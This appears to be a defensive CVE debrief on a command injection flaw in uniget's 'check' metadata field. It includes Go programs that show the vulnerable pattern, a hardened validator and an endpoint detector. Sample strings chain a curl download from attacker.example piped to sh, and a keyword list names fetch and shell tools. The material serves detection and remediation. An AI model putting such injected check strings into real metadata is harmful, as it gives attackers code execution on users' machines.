PatchSiren

CVE-2026-45152 uniget-org CVE debrief

CVE-2026-45152 is a command injection vulnerability in uniget, a universal installer and updater for container tools. The flaw affects versions prior to 0.27.1 and stems from the `check` field of tool metadata being passed verbatim to `/bin/bash -c`. Because the field is loaded from JSON metadata without validation or sanitization, an attacker who can supply or tamper with that metadata can embed shell syntax that runs whenever a user performs a common uniget operation (describe, install, update, inspect). The result is arbitrary code execution with the privileges of the user running uniget. The vulnerability was published on 2026-05-27 and is fixed in version 0.27.1.

Vendor: uniget-org
Product: cli
CVSS: HIGH 7.8
CISA KEV: Not listed in stored evidence
Original CVE published: 2026-05-27
Original CVE updated: 2026-05-28
Advisory published: 2026-05-27
Advisory updated: 2026-05-28

Who should care

Organizations and developers using uniget for container tool management, particularly those consuming metadata from external or untrusted sources. Security teams monitoring supply chain risks in container tooling ecosystems.

Technical summary

uniget executes the `check` field from JSON tool metadata by passing it as the argument of `/bin/bash -c`, with no input validation or sanitization. An attacker who controls the metadata can therefore place shell metacharacters, command chaining (`;`, `|`, `&&`) or command substitution (`$(...)`, backticks) in the field. When a user performs describe, install, update or inspect, uniget retrieves the attacker-controlled `check` string and hands it to the shell, which runs every command in it with the user's privileges; if uniget is invoked under sudo, that is root. The vulnerability is classified as CWE-78 (OS Command Injection).
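The following Go program is an added illustration for this debrief, not code from the uniget project. It reproduces the vulnerable pattern (a `check` string handed to `/bin/bash -c`) next to one conservative hardening: reject any shell metacharacter and execute the check as a program plus literal arguments, with no shell in between. The metadata struct, the sample JSON documents and the allow-list are assumptions constructed for the example; the real uniget metadata schema has more fields, and the upstream fix in 0.27.1 is not described on this page.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// Metadata carries only the field this debrief concerns. The real uniget
// metadata schema has many more fields; this shape is an assumption made
// for the example.
type Metadata struct {
	Name  string `json:"name"`
	Check string `json:"check"`
}

// Constructed sample metadata (not taken from any real uniget repository).
// The second document appends a download-and-execute chain after the
// legitimate version check.
const benignJSON = `{"name":"jq","check":"jq --version"}`
const maliciousJSON = `{"name":"jq","check":"jq --version; curl -s http://attacker.example/p | sh"}`

// parseMetadata decodes one metadata document.
func parseMetadata(raw string) (Metadata, error) {
	var md Metadata
	if err := json.Unmarshal([]byte(raw), &md); err != nil {
		return Metadata{}, err
	}
	return md, nil
}

// runCheckVulnerable reproduces the pattern the advisory describes: the check
// string is handed to a shell verbatim, so ';', '|', '$(...)' and friends in
// the metadata become additional commands. Only the *exec.Cmd is built here;
// the caller decides whether to Run it.
func runCheckVulnerable(check string) *exec.Cmd {
	return exec.Command("/bin/bash", "-c", check)
}

// shellMeta matches any character that would let a check string escape from
// "program plus literal arguments" into shell syntax.
var shellMeta = regexp.MustCompile("[;&|`$(){}<>\\\\\"'\\n\\r*?\\[\\]~#]")

// validateCheck accepts only a plain argv: whitespace-separated words with no
// shell metacharacters. This is an illustrative allow-list, not the upstream fix.
func validateCheck(check string) ([]string, error) {
	if strings.TrimSpace(check) == "" {
		return nil, errors.New("empty check field")
	}
	if loc := shellMeta.FindStringIndex(check); loc != nil {
		return nil, fmt.Errorf("check contains shell metacharacter %q at offset %d",
			check[loc[0]:loc[1]], loc[0])
	}
	return strings.Fields(check), nil
}

// runCheckHardened never invokes a shell: argv[0] is the program and the rest
// are passed as literal arguments, so the metadata cannot add commands.
func runCheckHardened(check string) (*exec.Cmd, error) {
	argv, err := validateCheck(check)
	if err != nil {
		return nil, err
	}
	return exec.Command(argv[0], argv[1:]...), nil
}

func main() {
	for _, raw := range []string{benignJSON, maliciousJSON} {
		md, err := parseMetadata(raw)
		if err != nil {
			fmt.Println("bad metadata:", err)
			continue
		}
		fmt.Printf("vulnerable argv: %q\n", runCheckVulnerable(md.Check).Args)
		if cmd, err := runCheckHardened(md.Check); err != nil {
			fmt.Println("hardened: rejected:", err)
		} else {
			fmt.Printf("hardened argv:   %q\n", cmd.Args)
		}
	}
}
```

The vulnerable argv for the malicious document is `["/bin/bash" "-c" "jq --version; curl -s http://attacker.example/p | sh"]`, which is exactly one string the shell will parse; the hardened path rejects it at the `;`. If real-world `check` strings legitimately need pipes or redirection, an allow-list of this kind has to be paired with a signed metadata channel rather than loosened, since any widening of the character set reopens the injection.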

Defensive priority

HIGH

Recommended defensive actions

  • Upgrade uniget to version 0.27.1 or later; this is the only complete remediation.
  • While unpatched versions remain in use, review any custom or third-party metadata files consumed by uniget and treat a `check` field containing `;`, `|`, `&&`, `$(`, backticks or redirection as suspect.
  • Until patching is complete, run uniget only in isolated environments with minimal privileges, and avoid invoking it under sudo, since an injected command inherits that elevation.
  • In endpoint detection, monitor for `/bin/bash -c` child processes spawned by uniget whose command string chains additional commands or launches network or download tools.
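As an added example of the monitoring action above (not part of the original debrief or of any EDR product), the Go program below scans newline-delimited process-creation events and flags shells spawned by a `uniget` parent with `-c` whose command string shows injection indicators. The event schema, field names and the four sample events are constructed for this example; real auditd or EDR telemetry will need a small mapping step onto the `ProcessEvent` struct.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"strings"
)

// ProcessEvent is a constructed, simplified process-creation record. Real
// auditd and EDR schemas differ; these field names are an assumption.
type ProcessEvent struct {
	TS         string   `json:"ts"`
	ParentComm string   `json:"parent_comm"`
	Comm       string   `json:"comm"`
	Argv       []string `json:"argv"`
}

// Constructed sample telemetry: a benign check, a check chained with a
// download, an unrelated bash -c from another parent that must not fire,
// and a check carrying command substitution.
const sampleEvents = `{"ts":"2026-05-27T10:00:01Z","parent_comm":"uniget","comm":"bash","argv":["/bin/bash","-c","jq --version"]}
{"ts":"2026-05-27T10:00:02Z","parent_comm":"uniget","comm":"bash","argv":["/bin/bash","-c","jq --version; curl -s http://attacker.example/p | sh"]}
{"ts":"2026-05-27T10:00:03Z","parent_comm":"make","comm":"bash","argv":["/bin/bash","-c","echo $(date) | tee build.log"]}
{"ts":"2026-05-27T10:00:04Z","parent_comm":"uniget","comm":"bash","argv":["/bin/bash","-c","helm version $(id)"]}`

// shells lists interpreter names whose -c argument is a command string.
var shells = map[string]bool{"bash": true, "sh": true, "dash": true, "zsh": true}

// chainTokens indicate the -c string is more than one simple command.
var chainTokens = []string{";", "|", "&&", "||", "$(", "`", "\n"}

// fetchTools are programs a dropper typically chains after a legitimate check.
var fetchTools = []string{"curl", "wget", "nc", "base64", "python", "perl"}

// suspicionReasons returns why a -c command string looks injected; an empty
// result means no indicator matched.
func suspicionReasons(cmdline string) []string {
	var reasons []string
	for _, tok := range chainTokens {
		if strings.Contains(cmdline, tok) {
			reasons = append(reasons, fmt.Sprintf("chain token %q", tok))
		}
	}
	words := strings.Fields(strings.NewReplacer(";", " ", "|", " ", "&", " ").Replace(cmdline))
	for _, word := range words {
		for _, tool := range fetchTools {
			if word == tool || strings.HasSuffix(word, "/"+tool) {
				reasons = append(reasons, "fetch/exec tool "+tool)
			}
		}
	}
	return reasons
}

// Finding describes one flagged event.
type Finding struct {
	TS      string
	Cmdline string
	Reasons []string
}

// detectUnigetShellInjection scans NDJSON events and returns one Finding per
// shell that uniget spawned with -c and an indicator-bearing command string.
func detectUnigetShellInjection(ndjson string) ([]Finding, error) {
	var findings []Finding
	sc := bufio.NewScanner(strings.NewReader(ndjson))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		var ev ProcessEvent
		if err := json.Unmarshal([]byte(line), &ev); err != nil {
			return nil, fmt.Errorf("bad event %q: %w", line, err)
		}
		if ev.ParentComm != "uniget" || !shells[ev.Comm] || len(ev.Argv) < 3 || ev.Argv[1] != "-c" {
			continue
		}
		if reasons := suspicionReasons(ev.Argv[2]); len(reasons) > 0 {
			findings = append(findings, Finding{TS: ev.TS, Cmdline: ev.Argv[2], Reasons: reasons})
		}
	}
	return findings, sc.Err()
}

func main() {
	findings, err := detectUnigetShellInjection(sampleEvents)
	if err != nil {
		fmt.Println("scan failed:", err)
		return
	}
	for _, f := range findings {
		fmt.Printf("%s  %q\n    %s\n", f.TS, f.Cmdline, strings.Join(f.Reasons, "; "))
	}
}
```

On an unpatched uniget every `check` still runs through `bash -c`, so the rule deliberately keys off chaining and fetch indicators rather than the shell spawn itself. Baseline it against the `check` strings in your own metadata before enabling it: if legitimate checks use pipes, move the pipe token out of `chainTokens` and rely on the fetch-tool list and `$(`.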

Evidence notes

The vulnerability description states that the `check` field from JSON metadata is executed via `/bin/bash -c` without validation, and that the common operations describe, install, update and inspect all reach this execution path. The CVSS 3.1 vector (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) encodes a local attack vector with no privileges required but user interaction required: the victim must run an affected uniget operation against the tampered metadata. Scope is unchanged, and the impact on confidentiality, integrity and availability is high, since the injected commands run as the invoking user.
